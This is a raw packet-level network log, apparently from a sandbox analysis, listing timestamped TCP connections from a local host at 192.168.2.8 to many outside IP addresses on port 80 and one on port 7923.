                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.416632891 CET8049956208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.416681051 CET4995680192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.424375057 CET80500203.254.94.185192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.424447060 CET5002080192.168.2.83.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.672065973 CET5002980192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.676862001 CET805002918.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.676925898 CET5002980192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.677021027 CET5002980192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.677037954 CET5002980192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.683168888 CET805002918.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.683182955 CET805002918.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.729383945 CET805002472.52.178.23192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.729702950 CET5002480192.168.2.872.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.729780912 CET5002480192.168.2.872.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.734561920 CET805002472.52.178.23192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.753814936 CET5003180192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.758791924 CET805003144.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.758863926 CET5003180192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.758977890 CET5003180192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.758994102 CET5003180192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.763797045 CET805003144.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.763834953 CET805003144.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:02.419172049 CET805003144.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:02.420972109 CET5003180192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:02.426496029 CET805003144.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:02.426549911 CET5003180192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:02.446865082 CET5003680192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:02.451709986 CET805003618.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:02.455408096 CET5003680192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:02.456665039 CET5003680192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:02.456681013 CET5003680192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:02.461426020 CET805003618.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:02.461505890 CET805003618.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.105318069 CET805002918.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.109834909 CET5002980192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.115031004 CET805002918.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.117209911 CET5002980192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.768152952 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.773041964 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.815277100 CET5004380192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.820210934 CET805004334.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.820446968 CET5004380192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.820584059 CET5004380192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.820584059 CET5004380192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.825464010 CET805004334.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.825476885 CET805004334.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.887723923 CET805003618.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.887952089 CET5003680192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.893177032 CET805003618.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.893421888 CET5003680192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.907659054 CET5004480192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.912575006 CET805004418.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.912678003 CET5004480192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.913007021 CET5004480192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.913007021 CET5004480192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.917767048 CET805004418.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.918026924 CET805004418.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:04.039443970 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:04.041691065 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:04.046669960 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:04.576754093 CET805004418.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:04.577008963 CET5004480192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:04.582125902 CET805004418.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:04.582326889 CET5004480192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:04.597897053 CET5005080192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:04.602832079 CET8050050172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:04.603080034 CET5005080192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:04.603188992 CET5005080192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:04.603188992 CET5005080192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:04.608148098 CET8050050172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:04.608166933 CET8050050172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:04.803533077 CET805004334.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:04.804491997 CET5004380192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:04.809892893 CET805004334.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:04.810045958 CET5004380192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:04.960391045 CET5005180192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:05.457535028 CET8050050172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:05.457602024 CET5005080192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:05.458065987 CET805005147.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:05.458133936 CET5005180192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:05.481843948 CET5005080192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:05.482758045 CET5005180192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:05.482801914 CET5005180192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:05.484354973 CET5005280192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:05.486783028 CET8050050172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:05.487679005 CET805005147.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:05.487689972 CET805005147.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:05.489268064 CET8050052172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:05.489336014 CET5005280192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:05.489577055 CET5005280192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:05.489577055 CET5005280192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:05.494448900 CET8050052172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:05.494460106 CET8050052172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:06.151851892 CET8050052172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:06.154412031 CET5005280192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:06.167646885 CET5005280192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:06.172559023 CET8050052172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:06.277650118 CET5005880192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:06.282711029 CET805005854.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:06.282823086 CET5005880192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:06.283076048 CET5005880192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:06.283154964 CET5005880192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:06.287895918 CET805005854.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:06.288750887 CET805005854.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:06.930658102 CET805005147.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:06.930820942 CET5005180192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:06.936090946 CET805005147.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:06.937477112 CET5005180192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:07.114553928 CET805005854.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:07.114695072 CET5005880192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:07.119971991 CET805005854.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:07.120023012 CET5005880192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:07.128227949 CET5006480192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:07.133100033 CET805006444.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:07.135677099 CET5006480192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:07.135783911 CET5006480192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:07.135828018 CET5006480192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:07.140599012 CET805006444.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:07.140616894 CET805006444.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:07.453866005 CET5006880192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:07.458822966 CET80500683.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:07.458885908 CET5006880192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:07.459582090 CET5006880192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:07.459609985 CET5006880192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:07.464361906 CET80500683.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:07.464376926 CET80500683.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:07.802495956 CET805006444.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:07.814554930 CET5006480192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:07.819674969 CET805006444.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:07.819732904 CET5006480192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:08.148924112 CET80500683.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:08.182939053 CET80500683.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:08.185870886 CET5006880192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:08.335690975 CET5006880192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:08.340488911 CET80500683.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:08.349370003 CET5007180192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:08.354238033 CET805007134.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:08.357892036 CET5007180192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:08.358045101 CET5007180192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:08.358074903 CET5007180192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:08.362822056 CET805007134.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:08.362838030 CET805007134.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:08.501105070 CET5007680192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:08.506103039 CET805007635.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:08.506253958 CET5007680192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:08.506408930 CET5007680192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:08.506567955 CET5007680192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:08.511265993 CET805007635.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:08.511370897 CET805007635.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.684621096 CET805007134.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.684743881 CET805007134.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.684761047 CET805007635.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.684772968 CET805007134.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.684823036 CET805007635.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.684817076 CET5007180192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.684834003 CET805007635.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.684871912 CET5007680192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.684880972 CET5007180192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.684920073 CET805007134.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.684967041 CET5007180192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.688726902 CET5007180192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.690984011 CET5007680192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.694276094 CET805007134.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.695770025 CET805007635.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.727987051 CET5007880192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.734232903 CET805007834.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.735374928 CET5007880192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.735507011 CET5007880192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.735518932 CET5007880192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.740391016 CET805007834.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.740415096 CET805007834.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.783807993 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.788674116 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.920862913 CET5007980192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.926028013 CET805007918.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.926120996 CET5007980192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.926631927 CET5007980192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.926666975 CET5007980192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.931425095 CET805007918.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:09.931436062 CET805007918.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:10.054397106 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:10.059508085 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:10.064351082 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:10.215574026 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:10.299290895 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:10.558945894 CET805007834.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:10.579129934 CET5007880192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:10.584269047 CET805007834.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:10.584372997 CET5007880192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:10.991156101 CET5008580192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:10.996082067 CET805008534.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:10.996153116 CET5008580192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:10.996531010 CET5008580192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:10.996556997 CET5008580192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:11.001746893 CET805008534.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:11.001796961 CET805008534.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:11.366274118 CET805007918.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:11.373425007 CET5007980192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:11.378643990 CET805007918.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:11.378751040 CET5007980192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:11.948751926 CET805008534.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:11.951749086 CET5008580192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:11.956965923 CET805008534.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:11.957029104 CET5008580192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:11.967672110 CET5009580192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:11.972498894 CET805009518.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:11.972664118 CET5009580192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:11.972906113 CET5009580192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:11.972924948 CET5009580192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:11.977745056 CET805009518.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:11.977756023 CET805009518.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:12.232331038 CET4979180192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:12.232844114 CET5009780192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:12.237620115 CET8049791208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:12.237938881 CET8050097208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:12.238003969 CET4979180192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:12.238034010 CET5009780192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:12.238210917 CET5009780192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:12.238228083 CET5009780192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:12.243318081 CET8050097208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:12.243731022 CET8050097208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:12.793729067 CET805009518.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:12.793994904 CET5009580192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:12.798968077 CET805009518.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:12.799031973 CET5009580192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:12.825473070 CET5010280192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:12.830300093 CET805010247.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:12.830400944 CET5010280192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:12.830816984 CET5010280192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:12.830852032 CET5010280192.168.2.847.129.31.212
